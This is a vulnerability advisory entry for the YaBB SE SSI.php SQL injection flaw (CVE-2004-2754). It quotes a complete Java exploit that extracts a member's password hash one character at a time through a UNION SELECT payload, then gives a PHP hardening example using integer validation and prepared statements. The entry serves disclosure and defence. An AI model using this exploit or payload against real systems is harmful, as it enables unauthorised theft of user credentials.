YaBB SE SSI.php ID_MEMBER Parameter SQL Injection Vulnerability

Vulnerability ID: 1107634    Type: SQL injection
Published: 2004-01-19    Updated: 2004-12-31
CVE: CVE-2004-2754    CNNVD ID: CNNVD-200412-200
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/23554
https://cxsecurity.com/issue/WLB-2007110045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-200
|Details
YaBB SE is a forum application written in PHP on MySQL. Its SSI.php script does not adequately filter user-supplied URI parameters, so a remote attacker can use it for SQL injection and may read sensitive information or modify the database. SSI.php returns data such as the forum's recent topics and board statistics; because the ID_MEMBER parameter is not sufficiently filtered, an attacker can submit malicious SQL that alters the logic of the original query, obtaining sensitive information or modifying the database.
|Exploit
source: http://www.securityfocus.com/bid/9449/info

A problem with YaBB SE could make it possible for a remote user to launch SQL injection attacks.

It has been reported that a problem exists in the SSI.php script distributed as part of YaBB SE. Due to insufficient sanitizing of user-supplied URI parameters, it is possible for a remote user to inject arbitrary SQL queries into the database used by YaBB SE. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

/*
 * YabbSe SQL Injection test code
 * The code is very ugly but it works OK
 * Use at your own risk.
 * compile:
 * javac yabb.java
 * exec:
 * java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
 * parameters are:
 * java yabb [url with path] [database_prefix] [ID_MEMBER]
 */
import java.net.*;
import java.io.*;

public class yabb {
    public static void main(String[] args) throws Exception {
        String Key = "";

        // One request per character of the 32-character password hash; each
        // response leaks the ASCII value of one character via the injected UNION.
        for (int count = 1; count <= 32; count++) {
            URL yabbForum = new URL(args[0]
                + "SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP"
                + "%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd," + count + ",1)%20)%20"
                + "%20,%20%200%20FROM%20" + args[1] + "members%20WHERE%20ID_MEMBER=" + args[2] + "/*");

            BufferedReader in = new BufferedReader(new InputStreamReader(yabbForum.openStream()));
            String inputLine = in.readLine();

            if (inputLine == null) {
                System.out.println("ERROR: The server doesn't return any data");
                System.exit(0);
            }

            // The leaked number is embedded in the page right after "action=im".
            int pos  = inputLine.indexOf("action=im");
            int pos2 = inputLine.indexOf(" ", pos + 11);

            if (pos < 0) {
                System.out.println("ERROR: The server doesn't return any data");
                System.exit(0);
            }

            String theNumber = inputLine.substring(pos + 11, pos2);
            char c = (char) Integer.parseInt(theNumber.trim());

            System.out.println(theNumber + "-" + c);
            Key += c;
            in.close();
        }
        System.out.println("Hashed password : " + Key);
    }
}
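As an added illustration (not code from YaBB SE or from the advisory), a hypothetical PHP member lookup of the kind the advisory describes: the unsafe version pastes ID_MEMBER into the query text, which is exactly what lets the payload above smuggle in a UNION SELECT, while the hardened version validates it as an integer and binds it as a prepared-statement parameter. The function names, the use of mysqli, and any column of the members table other than ID_MEMBER are assumptions.

```php
<?php
// Added example, not YaBB SE's own code. $prefix is the forum's configured
// table prefix (e.g. "yabbse_") read from config, never from the request.
// Table layout beyond the ID_MEMBER column is an assumption.

// UNSAFE: the request value becomes part of the SQL text, so a value such as
// "1 OR 1=2) GROUP BY ... UNION SELECT ... /*" rewrites the whole query.
function member_exists_unsafe(mysqli $db, string $prefix): bool
{
    $id  = $_GET['ID_MEMBER'] ?? '';
    $sql = "SELECT COUNT(*) FROM {$prefix}members WHERE ID_MEMBER = $id";
    $row = $db->query($sql)->fetch_row();
    return (int) $row[0] > 0;
}

// HARDENED: accept only a plain integer, then hand it to the server as a
// bound parameter so it can never be interpreted as SQL.
function member_exists_safe(mysqli $db, string $prefix): bool
{
    $id = filter_var($_GET['ID_MEMBER'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) {
        http_response_code(400);
        exit('ID_MEMBER must be an integer');
    }
    // Defence in depth: the prefix comes from config, but it is interpolated
    // into the statement text, so restrict it to identifier characters anyway.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    $stmt = $db->prepare("SELECT COUNT(*) FROM {$prefix}members WHERE ID_MEMBER = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($count);
    $stmt->fetch();
    $stmt->close();
    return (int) $count > 0;
}
```

With the hardened version, the exploit's request above is answered with HTTP 400 before any query runs, and a web-server access log showing non-numeric ID_MEMBER values on SSI.php is a simple signal of this attack being attempted.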
|References

Source: BID
Name: 9449
Link: http://www.securityfocus.com/bid/9449
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?release_id=210608&group_id=57105
Source: www.yabbse.org
Link: http://www.yabbse.org/community/index.php?thread=27122
Source: SECTRACK
Name: 1008764
Link: http://www.securitytracker.com/id?1008764
Source: BUGTRAQ
Name: 20040119YabbSESQLInjection
Link: http://www.securityfocus.com/archive/1/350244
Source: OSVDB
Name: 3618
Link: http://www.osvdb.org/3618
Source: SREASON
Name: 3371
Link: http://securityreason.com/securityalert/3371
Source: NSFOCUS
Name: 5956
Link: http://www.nsfocus.net/vulndb/5956